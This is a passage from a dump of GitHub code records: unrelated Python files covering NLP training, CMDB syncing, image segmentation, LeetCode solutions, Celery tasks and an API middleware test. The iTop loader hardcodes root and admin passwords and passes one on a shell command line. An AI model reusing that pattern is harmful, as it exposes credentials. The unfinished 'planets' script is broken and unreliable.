shadow=True)\nax2.legend(loc='best')\nfig.tight_layout()\nfig.savefig(\"chat_volume_breakdown.png\")\n\n\n\n","repo_name":"tmrob2/chat","sub_path":"substitution.py","file_name":"substitution.py","file_ext":"py","file_size_in_byte":9024,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"27037077333","text":"# negative sampling skip_gram 모델 low-level로 구현하기\n\nfrom nltk.stem import LancasterStemmer\nimport nltk\nfrom sklearn.metrics.pairwise import cosine_similarity\nimport numpy as np\nimport pandas as pd\nfrom tensorflow.keras.layers import Input, Dense, Embedding, Flatten, Activation, Dot\nfrom tensorflow.keras.models import Model\nfrom tensorflow.keras.optimizers import Adam\n\nnltk.download('punkt')\nnltk.download('gutenberg')\ntext_id = nltk.corpus.gutenberg.fileids()\nprint(text_id)\n\n# 영어 소설 10개 불러오기\ntext1 = nltk.corpus.gutenberg.raw('austen-emma.txt')\ntext2 = nltk.corpus.gutenberg.raw('austen-persuasion.txt')\ntext3 = nltk.corpus.gutenberg.raw('austen-sense.txt')\ntext4 = nltk.corpus.gutenberg.raw('bible-kjv.txt')\ntext5 = nltk.corpus.gutenberg.raw('blake-poems.txt')\ntext6 = nltk.corpus.gutenberg.raw('bryant-stories.txt')\ntext7 = nltk.corpus.gutenberg.raw('burgess-busterbrown.txt')\ntext8 = nltk.corpus.gutenberg.raw('carroll-alice.txt')\ntext9 = nltk.corpus.gutenberg.raw('chesterton-ball.txt')\ntext10 = nltk.corpus.gutenberg.raw('chesterton-brown.txt')\n\ntext = text1 + ' ' + text2 + ' ' + text3 + ' ' + text4 + ' ' + text5 + ' ' + text6 + ' ' + text7 + ' ' + text8 + ' ' + text9 + ' ' + text10\n\nsentences = nltk.sent_tokenize(text)\nprint(len(sentences))\nprint(sentences[:10])\n\nsen = []\nfor s in sentences:\n s = s.replace('\\n', ' ').replace(\"'\", '').replace('.', '').replace('-', '').replace('!', '').replace('?', '').replace(';', '').replace(',', '').replace('_', '').replace('(', '').replace(')', '').replace(':', '').replace('\"', \"\").replace('[', '').replace(']', '').strip().lower()\n sen.append(s)\n \nstemmer = LancasterStemmer()\nword_tokens = [nltk.word_tokenize(s) for s in sen]\n\n# stemming해 stem 리스트에 저장\nstem = []\ntmp = []\nfor s in word_tokens:\n for t in s:\n tmp.append(stemmer.stem(t))\n stem.append(tmp)\n tmp = []\n\n# trigram을 만들 때 문장의 길이가 3 미만인 경우 에러가 발생하므로 삭제\nfor s in stem:\n if len(s) < 3:\n stem.remove(s)\nlen(stem)\n\n# 전체 단어 사전 생성\nall_tokens = []\nfor s in stem:\n for t in s:\n all_tokens.append(t)\nlen(all_tokens)\n\n# word -> idx\nfrom tensorflow.keras.preprocessing.text import Tokenizer\n\ntokenizer = Tokenizer()\ntokenizer.fit_on_texts(all_tokens)\n\nword2idx = tokenizer.word_index\nidx2word = {v:k for k, v in word2idx.items()}\n\nto_idx = tokenizer.texts_to_sequences(stem)\n\n# 문장 별로 tri-gram 생성\ntrigram = []\ntmp = []\nfor s in to_idx:\n # trigram을 만들 수 없는 경우 (1388, 21, None)으로 패딩 pad_right=True\n for a, b, c in nltk.ngrams(s, 3, pad_right=True): \n tmp.append((a, b, c))\n trigram.append(tmp)\n tmp = []\nlen(trigram)\n\n# k = 2라고 가정했을 때,\nx_1 = [] # love, love, love, love, love, love\nx_2 = [] # I, you, rand_sample, rand_sample, rand_sample, rand_sample\ny = [] # 1, 1, 0, 0, 0, 0 이 들어가도록\n\n# x_1 데이터 만들기\nfor i in range(len(trigram)):\n for j in range(len(trigram[i])):\n for k in range(6):\n x_1.append(trigram[i][j][1])\n \nprint(x_1[:200])\n\nimport random\n# x_2 데이터 만들기 - Positive sampling\nfor i in range(len(trigram)):\n for j in range(len(trigram[i])):\n for k in range(0, 3, 2):\n x_2.append(trigram[i][j][k])\n y.append(1)\n \n # Negative sampling 4번\n for q in range(4):\n x_2.append(random.randint(1, 21948)) # max(word2idx.values()) == 21948\n y.append(0)\n \nprint(x_2[:200])\nprint(y[:200])\n\n# 리스트를 가지고 데이터프레임 구성\ndf = pd.DataFrame({\n 'input_1' : x_1,\n 'input_2' : x_2,\n 'label' : y\n})\n\ndf.dropna(axis=0, inplace=True)\ndf = df.sample(frac=1).reset_index(drop=True)\n\n# 데이터셋 구성\nX_1_train = np.array(df['input_1']).reshape(-1, 1)\nX_2_train = np.array(df['input_2']).reshape(-1, 1)\ny_train = np.array(df['label']).reshape(-1, 1)\nvocab_size = len(word2idx)+1 # word2idx가 0부터 시작했다면 +1을 안해줘도 됨. Embedding layer는 0부터 처리하므로 +1을 해준다.\n\n# 학습 모델링\nx_1_input = Input(batch_shape = (None, X_1_train.shape[1]))\nx_2_input = Input(batch_shape = (None, X_2_train.shape[1]))\n\nx_1_emb = Embedding(input_dim = vocab_size, output_dim = 32)(x_1_input)\nx_1_emb = Flatten()(x_1_emb)\n\nx_2_emb = Embedding(input_dim = vocab_size, output_dim = 32)(x_2_input)\nx_2_emb = Flatten()(x_2_emb)\n\nhidden = Dot(axes=1)([x_1_emb, x_2_emb])\ny_output = Activation('sigmoid')(hidden)\n\nmodel = Model([x_1_input, x_2_input], y_output)\nmodel.compile(loss='binary_crossentropy', optimizer=Adam(learning_rate=0.001))\n\n# word --> word2vec을 확인하기 위한 모델 (predict용 모델)\nmodel_w = Model(x_2_input, x_2_emb) # Model(x_1_input, x_1_emb)을 해도 상관없다.\n\nmodel.summary()\n\nhist = model.fit([X_1_train, X_2_train], y_train, epochs=20, batch_size=8192, validation_split=0.2)\n\nfather = model_w.predict(np.array(word2idx[stemmer.stem('father')]).reshape(1, 1))\nprint(father)\n\nmother = model_w.predict(np.array(word2idx[stemmer.stem('mother')]).reshape(1, 1))\nprint(mother)\n\ndoctor = model_w.predict(np.array(word2idx[stemmer.stem('doctor')]).reshape(1, 1))\nprint(doctor)\n\nfather_mother = cosine_similarity(mother, father)\nprint(father_mother)\n\nmother_doctor = cosine_similarity(mother, doctor)\nprint(mother_doctor)\n\nfather_doctor = cosine_similarity(father, doctor)\nprint(father_doctor)","repo_name":"dobbytk/NLP_study","sub_path":"Multicampus/NLP/day22/negative_smp_skipgram.py","file_name":"negative_smp_skipgram.py","file_ext":"py","file_size_in_byte":5327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"40756916612","text":"from sqlalchemy import create_engine\nimport re\nfrom pandas import Series, DataFrame, concat\nimport pandas as pd\nfrom pymongo import MongoClient\nimport subprocess as t\nimport logging\nfrom logging.config import fileConfig\nimport configparser\n\nfileConfig('logger_config.ini')\nlogger=logging.getLogger('infoLogger')\n\nclass LoadVMwareLicense():\n\n def __init__(self):\n self.cfg = configparser.ConfigParser()\n self.cfg.read(\"config.ini\") \n cmdb_db = self.cfg.get(\"cmdb\",\"db\")\n cmdb_str = self.cfg.get(\"cmdb\",\"conn_str\")\n self.client = MongoClient(cmdb_str)\n self.db = self.client[cmdb_db]\n \n self.engine = create_engine(\n \"mysql+pymysql://root:Password1@127.0.0.1:3306/itop?charset=utf8\", encoding=\"utf-8\", echo=False)\n\n def load_to_itopdb(self, df, source_table_name):\n self.engine.execute(\"delete from %s\" % source_table_name)\n df.to_sql(source_table_name, con=self.engine,\n if_exists='append', index=False)\n\n def apply_by_php(self, source_table_name):\n source_table_id = source_table_name.split('_').pop()\n php_cmd = \"php -q /itop_data/http_dir/itop/synchro/synchro_exec.php --auth_user=%s --auth_pwd=%s --data_sources=%s\" % (\n 'admin', 'Password1', source_table_id)\n output = t.getoutput(php_cmd)\n logger.info(output + \"\\n\")\n\n def get_vmware_license_src_df(self):\n vmware_license_coll = self.db['merge_vmware_license']\n vmware_license_df = pd.DataFrame(list(vmware_license_coll.find()))\n\n prefix = 'merge_'\n col_dict = {}\n for col in vmware_license_df.columns:\n if prefix in col:\n col_dict[col] = col.split(prefix)[1]\n\n # logger.info(vmware_license_df.rename(columns=col_dict))\n\n vmware_license_src_df = vmware_license_df.rename(columns=col_dict).assign(org_id=lambda x:1).assign(primary_key=lambda x:x['license_key']).assign(perpetual=lambda x:'yes').assign(licence_key=lambda x:x['license_key']).assign(software_id=lambda x:1)[['name','org_id','usage_limit','licence_key','perpetual','environment','used','primary_key','software_id']]\n\n return vmware_license_src_df\n\n def main(self):\n vmware_license_src_df = self.get_vmware_license_src_df()\n self.load_to_itopdb(\n df=vmware_license_src_df, source_table_name='synchro_data_vmwarelicense_103')\n self.apply_by_php(source_table_name='synchro_data_vmwarelicense_103')\n\n\nif __name__ == '__main__':\n license = LoadVMwareLicense()\n license.main()\n","repo_name":"yyztc/itop","sub_path":"load_vmware_license.py","file_name":"load_vmware_license.py","file_ext":"py","file_size_in_byte":2568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72947115892","text":"import os\nimport numpy as np\n\nimport torch\nimport torch.nn as neuralnetwork\nfrom torch.nn import functional as functional\n\nimport tiktoken\nfrom model import GenerativePretrainedTransformer, Config\n\nfrom halo import Halo\n\n\n\n# hyperparameters #\nencodeMethod = 'r50k_base'\nmaxNewTokens = 32 # number of tokens per sample\nprintConsole = False\nwriteToFile = True\n\nresumeDir = os.path.join('gpt', 'resume')\noutDir = os.path.join('gpt', 'output')\ncontextDir = os.path.join('gpt', 'context')\ndevice = 'cuda' if torch.cuda.is_available() else 'cpu'\n###################\n\n\n\n# model init\nckpt_path = os.path.join(resumeDir, os.listdir(resumeDir)[0])\ncheckpoint = torch.load(ckpt_path, map_location=device)\n\nprint(f\"Loaded model from {ckpt_path}\")\n\nconfig = Config(**checkpoint['modelArgs'])\nmodel = GenerativePretrainedTransformer(config)\n\nmodel.load_state_dict(checkpoint['model'])\n\nmodel.to(device)\n\nprint('Model has', sum(p.numel() for p in model.parameters()), 'parameters')\n\n\n# sampling\ndef sample():\n samplingLoading = Halo(text='Sampling: ', spinner='line', color='white', placement='right')\n samplingLoading.start()\n\n encoding = tiktoken.get_encoding(encodeMethod)\n\n contextFile = os.path.join(contextDir, os.listdir(contextDir)[0])\n\n with open(contextFile, 'r', encoding='utf-8') as file:\n contextString = file.read()\n\n contextIds = encoding.encode(contextString, allowed_special={'<|endoftext|>'})\n contextIds = contextIds[-96:]\n\n contextInput = (torch.tensor(contextIds, dtype=torch.long, device=device)[None, ...])\n\n\n with torch.no_grad():\n\n y = encoding.decode(model.generate(contextInput, maxNewTokens)[0].tolist()[-32:])\n\n if printConsole:\n print(f'\\n{y}')\n \n if writeToFile:\n newFile = os.path.join(outDir, 'sample.txt')\n\n open(newFile, 'w', encoding=\"utf-8\").write(y)\n\n\n samplingLoading.stop()","repo_name":"littlejohny2/discordbot","sub_path":"gpt/sample.py","file_name":"sample.py","file_ext":"py","file_size_in_byte":1896,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73504075251","text":"from flask import Flask, render_template\r\nimport dash\r\n\r\napp = Flask(__name__)\r\n\r\ndash_app = dash.Dash(\r\n __name__,\r\n server=app,\r\n routes_pathname_prefix='/dash/',\r\n external_stylesheets=['/static/css/styles.css']\r\n)\r\n\r\n@app.route('/')\r\ndef index():\r\n return render_template('index.html')\r\n","repo_name":"Yellowbaron/dash","sub_path":"app/flask_app.py","file_name":"flask_app.py","file_ext":"py","file_size_in_byte":306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71790926772","text":"#coding:utf-8\n\nfrom __future__ import division, absolute_import\nimport tensorflow as tf\nfrom tensorflow.contrib import layers\nimport numpy as np\n\n\n\ndef gen_conv_encoder(encoder_para):\n '''\n generate a one layer convolutional encoder\n\n @encoder_para: dict, parameters of method, including:\n @@img_size: np.ndarray, shape=[4:], the size of input image\n @@kernal_size: np.ndarray, shape=[4:], [width, height, input_channel, output_channel]\n @@strides: np.ndarray, shape=[4:], [batch_stride, width_stride, height_stride, channel_stride]\n '''\n\n img_size = encoder_para['img_size']\n kernal_size = encoder_para['kernal_size']\n strides = encoder_para['strides']\n\n # generate X and weight\n X = tf.placeholder(tf.float32, img_size) #batch_size, img_width, img_height, channel\n enc_knl = tf.get_variable(\"enc_knl\", shape=kernal_size, \\\n initializer=layers.xavier_initializer_conv2d())\n enc_b = tf.Variable(tf.zeros([kernal_size[-1]], dtype=tf.float32))\n #generate conv layer\n conv_layer = tf.nn.conv2d(X, enc_knl, strides, padding='SAME')\n conv_layer = tf.nn.relu(tf.nn.bias_add(conv_layer, enc_b))\n return conv_layer, X\n\ndef gen_conv_decoder(X, decoder_para):\n '''\n generate a one layer deconvolutional decoder\n\n @X: input data\n @decoder_para: dict, parameters of method, including:\n @@kernal_size: list, shape=[4:], [width, height, input_channel, output_channel]\n @@strides: list, shape=[4:], [batch_stride, width_stride, height_stride, channel_stride]\n @@output_size: list, shape=[4:], [batch, width, height, channel]\n '''\n\n # generate input and weight\n kernal_size = decoder_para['kernal_size']\n strides = decoder_para['strides']\n output_size = decoder_para['output_size']\n\n dec_knl = tf.get_variable(\"dec_knl\", shape=kernal_size, \\\n initializer=layers.xavier_initializer_conv2d())\n dec_b = tf.Variable(tf.zeros([kernal_size[-1]], dtype=tf.float32))\n # generate deconvolutional layer\n deconv_layer = tf.nn.conv2d_transpose(X, dec_knl, tf.stack(output_size), strides=strides, padding='SAME')\n deconv_layer = tf.nn.relu(tf.add(deconv_layer, dec_b))\n return deconv_layer\n\n\n\n\n \n\n\n","repo_name":"deadoggy/PatternRecognitionAssignments","sub_path":"FinalProj/sourcecode/EncDec/Conv_EncDec.py","file_name":"Conv_EncDec.py","file_ext":"py","file_size_in_byte":2258,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73727517492","text":"from itertools import permutations\n\nn = int(input())\nplanets = []\n\n\nclass Planet:\n def __init__(self, idx, x, y, z):\n self.idx = idx\n self.x = x\n self.y = y\n self.z = z\n\n\ndef get_min_distance(planet1, planet2):\n return min(\n abs(planet1[0] - planet2[0]),\n abs(planet1[1] - planet2[1]),\n abs(planet1[2] - planet2[2])\n )\n\n\nfor i in range(n):\n x, y, z = map(int, input().split(' '))\n planets.append(Planet(i, x, y, z))\n\nanswer = float('inf')\nfor p in list(permutations([0, 1, 2], 3)):\n i, j, k = p\n sorted_planets = sorted(planets, key=lambda x: (x[i], x[j], x[k]))\n print(sorted_planets)\n dist = 0\n for idx in range(n-1):\n dist += get_min_distance(sorted_planets[idx], sorted_planets[idx+1])\n\n answer = min(answer, dist)\n\nprint(answer)","repo_name":"eprj453/algorithm","sub_path":"PYTHON/BAEKJOON/2887_행성이동(미).py","file_name":"2887_행성이동(미).py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"39322721763","text":"\"\"\" Run CXR segmentation - heart\n\nUsage:\n run_segment.py [--dataframe=DF] [--target=TARGET] [--split=SPLIT] [--checkFiles] [--trueDir=TD] [--cleanIso] [--output_df=DF] [--color] [--invert]\n run_segment.py (-h | --help)\nExamples:\n train_unet.py /path/to/data/frame.csv /path/to/images /path/to/write/output/model.pth\nOptions:\n -h --help Show this screen.\n --dataframe=DF Optional data frame to select which images are of interest [default: None]\n --target=TARGET If optional df is specified, then need to include the target variable [default: None]\n --split=SPLIT If split, then split on the Dataset column keeping only the Te values [default: False]\n --checkFiles Should we check whether df files actually exist?\n --trueDir=TD Directory of ground-truth masks [Default:None]\n --cleanIso Should we clean isolated samples?\n --output_df=DF Output dataframe to file? [Default:None]\n --color Are the masks in color?\n --invert Does the mask need to be inverted?\n\"\"\"\n\n\n\n\nimport os\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"2\"\nfrom docopt import docopt\nimport pandas as pd\nimport fastai\nfrom fastai.vision import *\nimport pretrainedmodels\nfrom torch.utils.data.sampler import WeightedRandomSampler\nfrom sklearn.metrics import *\nfrom fastai.callbacks import *\nimport math\nimport time\n\nfrom SegmentationUtils import SegmentationDataset\nfrom SegmentationUtils import SegmentationModel\nfrom SegmentationUtils import SoftDiceLoss\n\nfrom torchvision.utils import save_image\n\nfrom unet_model import UNet\nimport cv2\nfrom scipy.ndimage import label, generate_binary_structure\n\n\ntfms_test = get_transforms(do_flip = False,max_warp = None,max_rotate=0.0,max_zoom=1.0,max_lighting=0.0)\ntfms = get_transforms(do_flip = False, \nmax_rotate = 5.0, max_zoom = 1.2, max_lighting=0.5,max_warp = None)\nnum_workers = 8\nbs = 64\nsize = 320\ncont_thresh = 50\nthresh = 1\n\n\ndef DICE(im1,im2):\n im1 = np.asarray(im1).astype(np.bool)\n im2 = np.asarray(im2).astype(np.bool)\n\n if im1.shape != im2.shape:\n raise ValueError(\"Shape mismatch: im1 and im2 must have the same shape.\")\n\n # Compute Dice coefficient\n intersection = np.logical_and(im1, im2)\n\n return 2. * intersection.sum() / (im1.sum() + im2.sum())\n\nif __name__ == '__main__':\n\n arguments = docopt(__doc__)\n \n ##Grab image directory\n image_dir = arguments['']\n mask_dir = arguments['']\n if(not os.path.exists(mask_dir)):\n os.mkdir(mask_dir)\n \n if(arguments['--dataframe']==\"None\"):\n files = [f for f in os.listdir(image_dir) if os.path.isfile(os.path.join(image_dir,f))] \n ###Results\n output_df = pd.DataFrame(columns = ['File','Dummy','Prediction'])\n \n output_df['File'] = files\n output_df['Dummy'] = np.random.random_sample(len(files))\n col = 'Dummy'\n else:\n output_df = pd.read_csv(arguments['--dataframe'])\n locs = []\n if(arguments['--checkFiles']):\n for i in range(0,output_df.shape[0]):\n if(os.path.exists(os.path.join(image_dir,output_df.iloc[i,0]))):\n locs.append(i)\n else:\n print(output_df.iloc[i,0])\n output_df = output_df.iloc[locs,:]\n \n output_df = output_df.reset_index(drop=True) \n col = arguments['--target']\n \n if(arguments[\"--split\"]!=\"False\"):\n output_df = output_df[output_df.Dataset==\"Te\",]\n \n\n \n ###Path to output model\n model_path = arguments[''] \n\n \n\n imgs = (ImageList.from_df(df=output_df,path=image_dir)\n .split_none()\n #.split_by_idx(valid_idx)\n .label_from_df(cols=col)\n .databunch(num_workers = num_workers,bs=bs))\n \n\n model = UNet(3,1,bilinear=False)\n if(arguments['--color']):\n model = UNet(3,3)\n\n \n learn = Learner(imgs, model)\n \n learn.load(arguments[''])\n learn.model.eval()\n learn.model.cuda()\n\n all_dice = []\n all_roc = []\n \n #import pdb; pdb.set_trace()\n pbar = progress_bar(range(output_df.shape[0]))\n for i in pbar:\n #import pdb; pdb.set_trace()\n curr = open_image(os.path.join(image_dir,output_df.iloc[i,0]))\n curr = curr.apply_tfms(tfms_test[0],size=size,do_resolve=False).px \n mask = learn.model(curr.view(1,3,size,size).cuda())\n \n\n if(arguments['--color']):\n mask = torch.round(mask*thresh)\n save_image(mask.view(3,size,size).detach().cpu(),os.path.join(mask_dir,output_df.iloc[i,0]))\n else:\n\n\n if(arguments['--invert']):\n mask = torch.round(mask*thresh)\n else:\n mask = 1-torch.round(mask*thresh)\n #mask = 1-torch.round(mask)\n #kernel = np.ones((5,5),np.uint8)\n #erosion = cv2.erode(img,kernel,iterations = 1)\n #remove random dots - MORPH_CLOSE to fill in blanks\n #opening = cv2.morphologyEx(img, cv2.MORPH_OPEN, kernel)\n\n mask = torch.mode(mask,dim=1)\n #import pdb; pdb.set_trace()\n #img = mask.values.data.cpu().numpy()\n #kernel = np.ones((3,3),np.uint8)\n #opening = cv2.morphologyEx(img,cv2.MORPH_CLOSE,kernel)\n #mask = torch.Tensor(opening)\n tmp = mask.values.cpu().detach().numpy()\n mask_for_dice = 1-tmp\n #import pdb; pdb.set_trace()\n if(arguments['--cleanIso']):\n arr,nf = label(tmp)\n unique,counts = np.unique(arr.flatten(),return_counts=True)\n lbls_keep = unique[counts < cont_thresh]\n tmp[np.isin(arr,lbls_keep)] = 0\n mask = torch.Tensor(tmp)\n else:\n mask = mask.values.cpu().detach()\n\n mask = mask.repeat(1,3,1,1)\n \n \n mask = 1 - mask\n mask = mask*curr.view(1,3,size,size)\n \n #Need to apply mask\n \n save_image(mask.view(3,size,size).detach().cpu(),os.path.join(mask_dir,output_df.iloc[i,0]))\n #import pdb; pdb.set_trace()\n #Add DICE score for to output df \n if(not arguments['--trueDir'] is None and arguments['--trueDir']!=\"None\" ):\n\n #Load ground truth mask\n curr2 = open_image(os.path.join(arguments['--trueDir'],output_df.iloc[i,0]))\n curr2 = curr2.apply_tfms(tfms_test[0],size=size,do_resolve=False).px\n curr2 = torch.round(curr2)\n curr2 = torch.mode(curr2,dim=0)\n tmp = curr2.values.cpu().detach().numpy()\n \n #Calculate intersection/union against predicted mask\n curr_dice = DICE(tmp,mask_for_dice[0,:,:])\n \n #Calculate roc AUC\n curr_roc = roc_auc_score(tmp.flatten(),mask_for_dice[0,:,:].flatten())\n #import pdb; pdb.set_trace()\n\n #Add to vector\n all_dice.append(curr_dice)\n all_roc.append(curr_roc)\n\n if(arguments['--output_df']!=\"None\"):\n output_df['DICE'] = pd.Series(all_dice)\n output_df['ROC'] = pd.Series(all_roc)\n output_df.to_csv(arguments['--output_df'])\n \n\n \n \n","repo_name":"vineet1992/Retina-Seg","sub_path":"Code/run_segment.py","file_name":"run_segment.py","file_ext":"py","file_size_in_byte":7580,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"31189334607","text":"#\n# @lc app=leetcode.cn id=179 lang=python3\n#\n# [179] 最大数\n#\n\n# @lc code=start\nclass Solution:\n def largestNumber(self, nums) -> str:\n n = len(nums)\n if n == 1:\n return str(nums[0])\n if set(nums) == {0}:\n return '0'\n def sort_key(a, b): # a < b ? a在前b在后;否者b在前a在后\n p1 = a * 10**(len(str(b))) + b # a在前b在后\n p2 = b * 10**(len(str(a))) + a\n if p1 < p2: # 正序\n return -1\n elif p1 > p2: # 逆序\n return 1\n else:\n return 0 \n from functools import cmp_to_key\n nums.sort(key=cmp_to_key(sort_key), reverse=True)\n # 原本key函数是将列表里的每个元素转换为待比较的key,在key上进行比较\n # 而这里传入的是比较函数,所以需要用cmp_to_key对比较函数进行一个转化\n res = ''.join([str(i) for i in nums])\n return res\n \n\n# nums = [3,30,34,345,5,9]\n# s = Solution().largestNumber(nums)\n\n# @lc code=end\n\n","repo_name":"Interesting6/FuckLeetCode","sub_path":"179.最大数.py","file_name":"179.最大数.py","file_ext":"py","file_size_in_byte":1073,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2655821251","text":"# Definition for a binary tree node.\nfrom typing import List\n\n\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\n\nclass Solution:\n def __init__(self):\n self.valid_paths = []\n\n def stackPathSum(self, root: TreeNode, targetSum: int) -> List[List[int]]:\n \"\"\"\n Runtime: 44 ms, faster than 76.98% of Python3 online submissions.\n Memory Usage: 15.1 MB, less than 97.78% of Python3 online submissions.\n \"\"\"\n if not root:\n return []\n else:\n solution = []\n stack = [(0, root, [])]\n\n while stack:\n cur_sum, node, cur_path = stack.pop()\n cur_sum += node.val\n cur_path.append(node.val)\n\n # Reached target and is a leaf!\n if cur_sum == targetSum and not node.left and not node.right:\n solution.append(cur_path[:])\n # Haven't reached target yet, keep exploring\n else:\n if node.right:\n stack.append((cur_sum, node.right, cur_path[:]))\n if (\n node.left\n ): # since popping from the end, we do left *after* right\n stack.append((cur_sum, node.left, cur_path[:]))\n\n return solution\n\n def recursivePathSum(\n self, root: TreeNode, targetSum: int, _sum=0, path=None\n ) -> List[List[int]]:\n \"\"\"\n Need to be careful with lists - identical code with path = [] led to bugs.\n\n Runtime: 52 ms, faster than 29.51% of Python3 online submissions.\n Memory Usage: 20 MB, less than 5.23% of Python3 online submissions.\n \"\"\"\n if root:\n if not path:\n path = []\n path.append(root.val)\n _sum += root.val\n\n if _sum == targetSum and not root.left and not root.right:\n self.valid_paths.append(path.copy())\n\n if root.left:\n self.pathSum(root.left, targetSum, _sum, path.copy())\n\n if root.right:\n self.pathSum(root.right, targetSum, _sum, path.copy())\n\n return self.valid_paths\n","repo_name":"IAjimi/Leetcode","sub_path":"113_Path_Sum_II.py","file_name":"113_Path_Sum_II.py","file_ext":"py","file_size_in_byte":2280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10772597663","text":"import numpy as np\n\n\nclass BurstyBinarySymmetricChannel:\n def __init__(self, burst_probability: float, burst_length: int) -> None:\n \"\"\"Construct a bursty binary symmetric channel. This channel introduces burst\n errors of burst_length bits with a probability of burst_probability. Note that\n this is NOT a channel model from the literature. However, similar channel models\n exist. See bursty binary noise channels.\n\n Args:\n burst_probability:\n The probabilty of a burst error occuring at any particular location.\n burst_length:\n The length of burst errors to generate. Each burst error will originate\n from a particular location and continue for burst_length bits.\n \"\"\"\n\n assert 0 <= burst_probability <= 1\n assert burst_length > 0\n\n self._distribution = [1 - burst_probability, burst_probability]\n self._burst_length = burst_length\n\n def transform(self, data: np.ndarray) -> np.ndarray:\n \"\"\"Introduce burst errors into the data.\n\n Args:\n data:\n The array of bits to introduce burst errors to. The behavior of this\n method is undefined on arrays that contain elements other than 0 and 1.\n\n Return: The data with burst errors.\n \"\"\"\n\n assert data.size > self._burst_length\n\n # Convert the data to the appropriate data type.\n data = data.astype(np.uint8, copy=False)\n\n # Iterate starting from indices outside of the data. This accounts for burst\n # errors originating outside of the current message that could still impact\n # the current message.\n for i in range(-self._burst_length + 1, data.size):\n\n # Check if we should introduce a burst error.\n if not np.random.choice((0, 1), p=self._distribution):\n continue\n\n # Introduce burst error.\n l = max(i, 0)\n r = min(data.size - 1, i + self._burst_length)\n data[l:r] ^= 1\n\n return data\n","repo_name":"SupurCalvinHiggins/ml-eec-decoder","sub_path":"channels/src/bursty_binary_symmetric_channel.py","file_name":"bursty_binary_symmetric_channel.py","file_ext":"py","file_size_in_byte":2079,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"74534180532","text":"from __future__ import absolute_import, unicode_literals\nfrom celery import shared_task\nfrom collections import OrderedDict\nimport requests\nimport logging\n\nfrom django.core.exceptions import ObjectDoesNotExist\n\nfrom pprint import pformat\n\nfrom fediverse.models import Post, User\nfrom fediverse.lib import sign_header, addDefaultHeader\n\n# resource: https://dot-blog.jp/news/django-async-celery-redis-mac/\n@shared_task(max_retries=10, default_retry_delays=60)\ndef APSend(targetUrl, fromUser, dct):\n dctOD = OrderedDict(**dct)\n dctOD['@context'] = [\n \"https://www.w3.org/ns/activitystreams\",\n \"https://w3id.org/security/v1\"\n ]\n dctOD.move_to_end('@context', False)\n logging.info(f\"APSEND => {targetUrl}\")\n logging.info(\"APBODY: \")\n logging.info(pformat(dict(dctOD)))\n try:\n res = requests.post(\n targetUrl,\n json=dict(dctOD),\n auth=sign_header(fromUser),\n headers=addDefaultHeader()\n )\n res.raise_for_status()\n except:\n logging.warn(\"APSend was failed. It will be try to retry.\")\n raise APSend.retry()\n return res.status_code\n\n@shared_task\ndef AccountDeletion(username):\n try:\n target = User.objects.get(username__iexact=username)\n except ObjectDoesNotExist:\n logging.error(\"Target username is not found.\")\n raise ValueError(\"Target username is not found.\")\n\n target.posts.all().delete()\n target.following.all().delete()\n target.followers.all().delete()\n target.liked.all().delete()\n target.blocking.all().delete()\n target.blocked.all().delete()\n \n return True\n","repo_name":"YuzuRyo61/CrossPlan","sub_path":"CrossPlan/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":1632,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"21"} +{"seq_id":"18380961301","text":"import json\n\nimport pytest\nimport requests\nfrom wazuh_testing import api\n\n# Marks\npytestmark = [pytest.mark.server]\n\n\n# Tests\n\n@pytest.mark.parametrize(\n 'method, endpoint_url, json_body, use_login_token, expected_status_code, expected_response_text', [\n ('POST', '/agents', {\"wrong_key\": \"val\"}, True, 400,\n {'title': 'Bad Request', 'detail': \"'name' is a required property\"}),\n ('GET', '/not_found_endpoint', None, True, 404,\n {'title': 'Not Found', 'detail': '404: Not Found'}),\n ('GET', '/agents', None, False, 401,\n {'title': 'Unauthorized', 'detail': 'No authorization token provided'}),\n ('POST', '/security/user/authenticate', None, False, 401,\n {'title': 'Unauthorized', 'detail': 'Invalid credentials'})\n ])\n@pytest.mark.filterwarnings('ignore::urllib3.exceptions.InsecureRequestWarning')\ndef test_response_postprocessing(restart_api_module, get_api_details, method, endpoint_url, json_body, use_login_token,\n expected_status_code, expected_response_text):\n '''\n description: Check if the response_postprocessing API middleware works.\n\n wazuh_min_version: 4.0.0\n\n tier: 0\n\n parameters:\n - get_api_details:\n type: fixture\n brief: Get API information.\n - method:\n type: str\n brief: Method used in the API request.\n - endpoint_url:\n type: str\n brief: Endpoint requested in the test.\n - json_body:\n type: dict\n brief: JSON body used in POST API requests.\n - use_login_token:\n type: bool\n brief: Variable used to determine whether a login token for the API request is needed or not.\n - expected_status_code:\n type: int\n brief: Status code expected in the API response.\n - expected_response_text:\n type: dict\n brief: Dictionary representing the expected API response text.\n\n assertions:\n - Verify that the fields are the expected ones when getting a 400 status code response (bad request).\n - Verify that the fields are the expected ones when getting a 404 status code response (not found).\n - Verify that the details are the expected ones when getting a 401 status code response (unauthorized).\n - Verify that the details are the expected ones when getting a 401 status code response (invalid credentials).\n\n tags:\n - headers\n - security\n '''\n api_details = get_api_details()\n headers = api_details['auth_headers'] if use_login_token else api.get_login_headers('wrong_user', 'wrong_password')\n\n # Make an API request\n response = getattr(requests, 